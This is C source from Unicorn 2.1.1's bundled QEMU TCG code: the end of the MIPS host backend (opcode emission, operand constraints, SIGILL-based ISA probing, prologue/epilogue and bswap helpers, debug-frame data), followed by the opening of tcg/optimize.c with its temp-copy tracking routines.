case INDEX_op_rotl_i32: if (c2) { tcg_out_opc_sa(s, OPC_ROTR, a0, a1, 32 - a2); } else { tcg_out_opc_reg(s, OPC_SUBU, TCG_TMP0, TCG_REG_ZERO, a2); tcg_out_opc_reg(s, OPC_ROTRV, a0, TCG_TMP0, a1); } break; case INDEX_op_sar_i64: if (c2) { tcg_out_dsra(s, a0, a1, a2); break; } i1 = OPC_DSRAV; goto do_shiftv; case INDEX_op_shl_i64: if (c2) { tcg_out_dsll(s, a0, a1, a2); break; } i1 = OPC_DSLLV; goto do_shiftv; case INDEX_op_shr_i64: if (c2) { tcg_out_dsrl(s, a0, a1, a2); break; } i1 = OPC_DSRLV; goto do_shiftv; case INDEX_op_rotr_i64: if (c2) { tcg_out_opc_sa64(s, OPC_DROTR, OPC_DROTR32, a0, a1, a2); break; } i1 = OPC_DROTRV; goto do_shiftv; case INDEX_op_rotl_i64: if (c2) { tcg_out_opc_sa64(s, OPC_DROTR, OPC_DROTR32, a0, a1, 64 - a2); } 
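        /* Rotate-left is synthesized from rotate-right via the identity
           rol(x, n) == ror(x, (width - n) & (width - 1)); e.g. a 64-bit
           rotl by 8 becomes DROTR by 56 above, while the register case
           below negates the count for DROTRV instead. */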
else { tcg_out_opc_reg(s, OPC_DSUBU, TCG_TMP0, TCG_REG_ZERO, a2); tcg_out_opc_reg(s, OPC_DROTRV, a0, TCG_TMP0, a1); } break; case INDEX_op_clz_i32: tcg_out_clz(s, OPC_CLZ, OPC_CLZ_R6, 32, a0, a1, a2); break; case INDEX_op_clz_i64: tcg_out_clz(s, OPC_DCLZ, OPC_DCLZ_R6, 64, a0, a1, a2); break; case INDEX_op_deposit_i32: tcg_out_opc_bf(s, OPC_INS, a0, a2, args[3] + args[4] - 1, args[3]); break; case INDEX_op_deposit_i64: tcg_out_opc_bf64(s, OPC_DINS, OPC_DINSM, OPC_DINSU, a0, a2, args[3] + args[4] - 1, args[3]); break; case INDEX_op_extract_i32: tcg_out_opc_bf(s, OPC_EXT, a0, a1, args[3] - 1, a2); break; case INDEX_op_extract_i64: tcg_out_opc_bf64(s, OPC_DEXT, OPC_DEXTM, OPC_DEXTU, a0, a1, args[3] - 1, a2); break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: tcg_out_brcond(s, a2, a0, a1, arg_label(args[3])); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], arg_label(args[5])); break; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: tcg_out_movcond(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: tcg_out_setcond(s, args[3], a0, a1, a2); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_add2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef SZ_S = { .args_ct_str = { "SZ", "S" } }; static const TCGTargetOpDef rZ_rZ = { .args_ct_str = { "rZ", "rZ" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rJ = { .args_ct_str = { "r", "r", "rJ" } }; static const TCGTargetOpDef SZ_S_S = { .args_ct_str = { "SZ", "S", "S" } }; static const TCGTargetOpDef SZ_SZ_S = { .args_ct_str = { "SZ", "SZ", "S" } }; static const TCGTargetOpDef SZ_SZ_S_S = { .args_ct_str = { "SZ", "SZ", "S", "S" } }; static const TCGTargetOpDef r_rZ_rN = { .args_ct_str = { "r", "rZ", "rN" } }; static const TCGTargetOpDef r_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef r_r_rIK = { .args_ct_str = { "r", "r", "rIK" } }; static const TCGTargetOpDef r_r_rWZ = { .args_ct_str = { "r", "r", "rWZ" } }; static const TCGTargetOpDef r_r_r_r = { .args_ct_str = { "r", "r", "r", "r" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "0" } }; static const TCGTargetOpDef movc_r6 = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rN", "rN" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_not_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_extract_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld_i64: case INDEX_op_not_i64: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: case INDEX_op_extract_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_rJ; case INDEX_op_sub_i32: case INDEX_op_sub_i64: return &r_rZ_rN; case INDEX_op_mul_i32: case INDEX_op_mulsh_i32: case INDEX_op_muluh_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_rem_i32: case INDEX_op_remu_i32: case INDEX_op_nor_i32: case INDEX_op_setcond_i32: case INDEX_op_mul_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: case 
INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_rem_i64: case INDEX_op_remu_i64: case INDEX_op_nor_i64: case INDEX_op_setcond_i64: return &r_rZ_rZ; case INDEX_op_muls2_i32: case INDEX_op_mulu2_i32: case INDEX_op_muls2_i64: case INDEX_op_mulu2_i64: return &r_r_r_r; case INDEX_op_and_i32: case INDEX_op_and_i64: return &r_r_rIK; case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rI; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotr_i32: case INDEX_op_rotl_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotr_i64: case INDEX_op_rotl_i64: return &r_r_ri; case INDEX_op_clz_i32: case INDEX_op_clz_i64: return &r_r_rWZ; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &rZ_rZ; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return use_mips32r6_instructions ? &movc_r6 : &movc; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return &add2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_qemu_ld_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &r_L : &r_L_L); case INDEX_op_qemu_st_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &SZ_S : &SZ_S_S); case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS == 32 ? &r_r_L : &r_r_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &SZ_S : TARGET_LONG_BITS == 32 ? &SZ_SZ_S : &SZ_SZ_S_S); default: return NULL; } } static const int tcg_target_callee_save_regs[] = { TCG_REG_S0, /* used for the global env (TCG_AREG0) */ TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_RA, /* should be last for ABI compliance */ }; /* The Linux kernel doesn't provide any information about the available instruction set. Probe it using a signal handler. */ #ifndef use_movnz_instructions bool use_movnz_instructions = false; #endif #ifndef use_mips32_instructions bool use_mips32_instructions = false; #endif #ifndef use_mips32r2_instructions bool use_mips32r2_instructions = false; #endif static volatile sig_atomic_t got_sigill; static void sigill_handler(int signo, siginfo_t *si, void *data) { /* Skip the faulty instruction */ ucontext_t *uc = (ucontext_t *)data; uc->uc_mcontext.pc += 4; got_sigill = 1; } static void tcg_target_detect_isa(void) { struct sigaction sa_old, sa_new; memset(&sa_new, 0, sizeof(sa_new)); sa_new.sa_flags = SA_SIGINFO; sa_new.sa_sigaction = sigill_handler; sigaction(SIGILL, &sa_new, &sa_old); /* Probe for movn/movz, necessary to implement movcond. */ #ifndef use_movnz_instructions got_sigill = 0; asm volatile(".set push\n" ".set mips32\n" "movn $zero, $zero, $zero\n" "movz $zero, $zero, $zero\n" ".set pop\n" : : : ); use_movnz_instructions = !got_sigill; #endif /* Probe for MIPS32 instructions. As no subsetting is allowed by the specification, it is only necessary to probe for one of the instructions. */ #ifndef use_mips32_instructions got_sigill = 0; asm volatile(".set push\n" ".set mips32\n" "mul $zero, $zero\n" ".set pop\n" : : : ); use_mips32_instructions = !got_sigill; #endif /* Probe for MIPS32r2 instructions if MIPS32 instructions are available. As no subsetting is allowed by the specification, it is only necessary to probe for one of the instructions. 
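
   Sketch of the round trip: sigill_handler() above advances
   uc_mcontext.pc past the 4-byte faulting insn and sets got_sigill, so

     got_sigill = 0;
     asm volatile(... one r2-only insn, e.g. "seb $zero, $zero" ...);
     use_mips32r2_instructions = !got_sigill;

   either executes the insn harmlessly or resumes right after it with
   the flag set.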
*/ #ifndef use_mips32r2_instructions if (use_mips32_instructions) { got_sigill = 0; asm volatile(".set push\n" ".set mips32r2\n" "seb $zero, $zero\n" ".set pop\n" : : : ); use_mips32r2_instructions = !got_sigill; } #endif sigaction(SIGILL, &sa_old, NULL); } static tcg_insn_unit *align_code_ptr(TCGContext *s) { uintptr_t p = (uintptr_t)s->code_ptr; if (p & 15) { p = (p + 15) & -16; s->code_ptr = (void *)p; } return s->code_ptr; } /* Stack frame parameters. */ #define REG_SIZE (TCG_TARGET_REG_BITS / 8) #define SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * REG_SIZE) #define TEMP_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define FRAME_SIZE ((TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE + SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define SAVE_OFS (TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE) /* We're expecting to be able to use an immediate for frame allocation. */ QEMU_BUILD_BUG_ON(FRAME_SIZE > 0x7fff); /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i; tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, TEMP_SIZE); /* TB prologue */ tcg_out_opc_imm(s, ALIAS_PADDI, TCG_REG_SP, TCG_REG_SP, -FRAME_SIZE); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } #ifndef CONFIG_SOFTMMU if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif /* Call generated code */ tcg_out_opc_reg(s, OPC_JR, 0, tcg_target_call_iarg_regs[1], 0); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_mov(s, TCG_TYPE_REG, TCG_REG_V0, TCG_REG_ZERO); /* TB epilogue */ tb_ret_addr = s->code_ptr; for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* delay slot */ tcg_out_opc_imm(s, ALIAS_PADDI, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE); if (use_mips32r2_instructions) { return; } /* Bswap subroutines: Input in TCG_TMP0, output in TCG_TMP3; clobbers TCG_TMP1, TCG_TMP2. */ /* * bswap32 -- 32-bit swap (signed result for mips64). a0 = abcd. */ bswap32_addr = align_code_ptr(s); /* t3 = (ssss)d000 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP3, TCG_TMP0, 24); /* t1 = 000a */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 24); /* t2 = 00c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = d00a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 0abc */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 8); /* t2 = 0c00 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP2, TCG_TMP2, 8); /* t1 = 00b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = dc0a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = dcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); if (TCG_TARGET_REG_BITS == 32) { return; } /* * bswap32u -- unsigned 32-bit swap. a0 = ....abcd. 
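 *
 * E.g. for a0 = 0x........123456f8 the result must be
 * t3 = 0x00000000f8563412; the bswap32 helper above would instead leave
 * the sign-extended 0xfffffffff8563412, which is why a separate
 * zero-extending variant is needed on 64-bit hosts.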
*/ bswap32u_addr = align_code_ptr(s); /* t1 = (0000)000d */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP0, 0xff); /* t3 = 000a */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP3, TCG_TMP0, 24); /* t1 = (0000)d000 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 24); /* t2 = 00c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = d00a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 0abc */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 8); /* t2 = 0c00 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP2, TCG_TMP2, 8); /* t1 = 00b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = dc0a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = dcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* * bswap64 -- 64-bit swap. a0 = abcdefgh */ bswap64_addr = align_code_ptr(s); /* t3 = h0000000 */ tcg_out_dsll(s, TCG_TMP3, TCG_TMP0, 56); /* t1 = 0000000a */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 56); /* t2 = 000000g0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = h000000a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 00000abc */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 40); /* t2 = 0g000000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 40); /* t1 = 000000b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = hg00000a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); /* t2 = 0000abcd */ tcg_out_dsrl(s, TCG_TMP2, TCG_TMP0, 32); /* t3 = hg0000ba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 000000c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP2, 0xff00); /* t2 = 0000000d */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP2, 0x00ff); /* t1 = 00000c00 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 8); /* t2 = 0000d000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 24); /* t3 = hg000cba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 00abcdef */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 16); /* t3 = hg00dcba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); /* t2 = 0000000f */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP1, 0x00ff); /* t1 = 000000e0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t2 = 00f00000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 40); /* t1 = 000e0000 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 24); /* t3 = hgf0dcba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = hgfedcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); } static void tcg_target_init(TCGContext *s) { tcg_target_detect_isa(); s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff; } s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T4); 
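    /* (Continuing the caller-saved set: under the MIPS calling
       conventions $v0-$v1, $a0-$a3 and $t0-$t9 are call-clobbered,
       while the $s registers saved by the prologue are preserved.) */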
tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T9); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); /* zero register */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_K0); /* kernel use only */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_K1); /* kernel use only */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP1); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP2); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP3); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return address */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); /* stack pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); /* global pointer */ } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { atomic_set((uint32_t *)jmp_addr, deposit32(OPC_J, 0, 26, addr >> 2)); flush_icache_range(jmp_addr, jmp_addr + 4); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2]; } DebugFrame; #define ELF_HOST_MACHINE EM_MIPS /* GDB doesn't appear to require proper setting of ELF_HOST_FLAGS, which is good because they're really quite complicated for MIPS. */ static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE) - 4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -(TCG_TARGET_REG_BITS / 8) & 0x7f, /* sleb128 */ .h.cie.return_column = TCG_REG_RA, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_SP, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... 
uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) },
    .fde_reg_ofs = {
        0x80 + 16, 9,               /* DW_CFA_offset, s0, -72 */
        0x80 + 17, 8,               /* DW_CFA_offset, s1, -64 */
        0x80 + 18, 7,               /* DW_CFA_offset, s2, -56 */
        0x80 + 19, 6,               /* DW_CFA_offset, s3, -48 */
        0x80 + 20, 5,               /* DW_CFA_offset, s4, -40 */
        0x80 + 21, 4,               /* DW_CFA_offset, s5, -32 */
        0x80 + 22, 3,               /* DW_CFA_offset, s6, -24 */
        0x80 + 30, 2,               /* DW_CFA_offset, s8, -16 */
        0x80 + 31, 1,               /* DW_CFA_offset, ra, -8 */
    }
};

void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size)
{
    tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame));
}

unicorn-2.1.1/qemu/tcg/optimize.c

/*
 * Optimizations for Tiny Code Generator for QEMU
 *
 * Copyright (c) 2010 Samsung Electronics.
 * Contributed by Kirill Batuzov <batuzovk@ispras.ru>
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
#include "qemu/osdep.h"
#include "tcg/tcg-op.h"

#define CASE_OP_32_64(x)                        \
        glue(glue(case INDEX_op_, x), _i32):    \
        glue(glue(case INDEX_op_, x), _i64)

#define CASE_OP_32_64_VEC(x)                    \
        glue(glue(case INDEX_op_, x), _i32):    \
        glue(glue(case INDEX_op_, x), _i64):    \
        glue(glue(case INDEX_op_, x), _vec)

struct tcg_temp_info {
    bool is_const;
    TCGTemp *prev_copy;
    TCGTemp *next_copy;
    tcg_target_ulong val;
    tcg_target_ulong mask;
};

static inline struct tcg_temp_info *ts_info(TCGTemp *ts)
{
    return ts->state_ptr;
}

static inline struct tcg_temp_info *arg_info(TCGArg arg)
{
    return ts_info(arg_temp(arg));
}

static inline bool ts_is_const(TCGTemp *ts)
{
    return ts_info(ts)->is_const;
}

static inline bool arg_is_const(TCGArg arg)
{
    return ts_is_const(arg_temp(arg));
}

static inline bool ts_is_copy(TCGTemp *ts)
{
    return ts_info(ts)->next_copy != ts;
}

/* Reset TEMP's state, possibly removing the temp from the list of copies. */
static void reset_ts(TCGTemp *ts)
{
    struct tcg_temp_info *ti = ts_info(ts);
    struct tcg_temp_info *pi = ts_info(ti->prev_copy);
    struct tcg_temp_info *ni = ts_info(ti->next_copy);

    ni->prev_copy = ti->prev_copy;
    pi->next_copy = ti->next_copy;
    ti->next_copy = ts;
    ti->prev_copy = ts;
    ti->is_const = false;
    ti->mask = -1;
}

static void reset_temp(TCGArg arg)
{
    reset_ts(arg_temp(arg));
}

/* Initialize and activate a temporary. */
static void init_ts_info(TCGContext *tcg_ctx, struct tcg_temp_info *infos,
                         TCGTempSet *temps_used, TCGTemp *ts)
{
    size_t idx = temp_idx(tcg_ctx, ts);
    if (!test_bit(idx, temps_used->l)) {
        struct tcg_temp_info *ti = &infos[idx];

        ts->state_ptr = ti;
        ti->next_copy = ts;
        ti->prev_copy = ts;
        ti->is_const = false;
        ti->mask = -1;
        set_bit(idx, temps_used->l);
    }
}

static void init_arg_info(TCGContext *tcg_ctx, struct tcg_temp_info *infos,
                          TCGTempSet *temps_used, TCGArg arg)
{
    init_ts_info(tcg_ctx, infos, temps_used, arg_temp(arg));
}

static TCGTemp *find_better_copy(TCGContext *s, TCGTemp *ts)
{
    TCGTemp *i;

    /* If this is already a global, we can't do better. */
    if (ts->temp_global) {
        return ts;
    }

    /* Search for a global first. */
    for (i = ts_info(ts)->next_copy; i != ts; i = ts_info(i)->next_copy) {
        if (i->temp_global) {
            return i;
        }
    }

    /* If it is a temp, search for a temp local. */
    if (!ts->temp_local) {
        for (i = ts_info(ts)->next_copy; i != ts; i = ts_info(i)->next_copy) {
            if (i->temp_local) {
                return i;
            }
        }
    }

    /* Failure to find a better representation, return the same temp. */
    return ts;
}

static bool ts_are_copies(TCGTemp *ts1, TCGTemp *ts2)
{
    TCGTemp *i;

    if (ts1 == ts2) {
        return true;
    }

    if (!ts_is_copy(ts1) || !ts_is_copy(ts2)) {
        return false;
    }

    for (i = ts_info(ts1)->next_copy; i != ts1; i = ts_info(i)->next_copy) {
        if (i == ts2) {
            return true;
        }
    }

    return false;
}

static bool args_are_copies(TCGArg arg1, TCGArg arg2)
{
    return ts_are_copies(arg_temp(arg1), arg_temp(arg2));
}

static void tcg_opt_gen_movi(TCGContext *s, TCGOp *op, TCGArg dst, TCGArg val)
{
    const TCGOpDef *def;
    TCGOpcode new_op;
    tcg_target_ulong mask;
    struct tcg_temp_info *di = arg_info(dst);

    def = &s->tcg_op_defs[op->opc];
    if (def->flags & TCG_OPF_VECTOR) {
        new_op = INDEX_op_dupi_vec;
    } else if (def->flags & TCG_OPF_64BIT) {
        new_op = INDEX_op_movi_i64;
    } else {
        new_op = INDEX_op_movi_i32;
    }
    op->opc = new_op;
    /* TCGOP_VECL and TCGOP_VECE remain unchanged. */
    op->args[0] = dst;
